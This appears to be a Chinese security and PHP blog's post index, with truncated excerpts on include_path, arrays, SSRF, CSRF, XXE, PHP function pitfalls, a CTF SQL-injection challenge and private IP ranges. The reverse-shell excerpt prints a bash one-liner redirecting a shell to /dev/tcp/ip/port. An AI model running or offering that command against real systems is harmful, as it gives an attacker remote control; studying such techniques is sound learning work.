原创 php.ini中的include_path配置
一直對include_path的作用不了解,也沒怎麼注意過它的用途,今天在網上看一些資料後明白了,記錄一下: 其實設置include_path的作用就是設置用include()函數包函文件時的路徑,當然也可以不設置includ
2020-06-06 21:41:41
1
原创 PHP數組的創建
一.php數組創建有兩種方法 這是第一種辦法,是最常見的辦法 $arr = array(...); 第二種辦法,由於PHP是動態語言,所以可以不用new就能創建數組 $arr[] = 10; $arr[]= 12; 輸出的時候回出現arr
2020-06-06 21:41:41
原创 ssrf
SSRF形成的原因是服務端提供了從其他服務器應用獲取數據的功能,在用戶可控的情況下,未對目標地址進行過濾與限制,導致此漏洞的產生。 利用函數file_get_concents();fopen()和fpassthru();curl_exec
2019-04-05 09:50:06
6
原创 CSRF漏洞原理利用與防禦
轉自:http://www.cnblogs.com/hyddd/ 一.CSRF是什麼? CSRF(Cross-site request forgery),中文名稱:跨站請求僞造,也被稱爲:one click attack/sessio
2019-04-05 09:50:06
原创 php函數漏洞
1.intval() intval — 獲取變量的整數值 說明 int intval ( mixed $var [, int $base = 10 ] ) 通過使用指定的進制 base 轉換(默認是十進制),返回變量 var 的 inte
2019-04-05 09:50:06
3
原创 南郵 sql注入2
<?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_M
2019-04-05 09:50:06
原创 反彈shell
反彈shell語句 bash -i >& /dev/tcp/ip/port 0>&1 這句的意思是 首先將標準輸出重定向/dev/tcp/ip/port也就是遠程 然後再把標準輸入重定向遠程。 然後就可以在遠程輸入輸出了 其中ip必
2019-04-05 09:50:06
原创 內網ip
內網IP是以下面幾個段開頭的IP.用戶可以自己設置.常用的內網IP地址: 10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x 查看內網IP地址。 內 網的計算機以NAT(網絡地址轉換)協議,通過一個公共
2019-04-05 09:50:06
原创 PHP類
1.PHP自定義類 類中的成員屬性如果沒有特殊關鍵字修飾 就必須加上var關鍵字,而在其他地方不需要這樣做 2.PHP類中的構造方法無法進行重載 構造方法不要設置成私有的權限 也就是說在php類中只能聲明一個構造方法,不過可以通
2019-04-05 09:50:06
原创 xxe
1.如何甄別可能存在xxe 最直接的回答就是: 甄別那些接受XML作爲輸入內容的端點。 但是有時候,這些端點可能並不是那麼明顯(比如,一些僅使用JSON去訪問服務的客戶端)。 在這種情況下,滲透測試人員就必須嘗試不同的測試方式,比如修改H
2019-04-05 09:50:06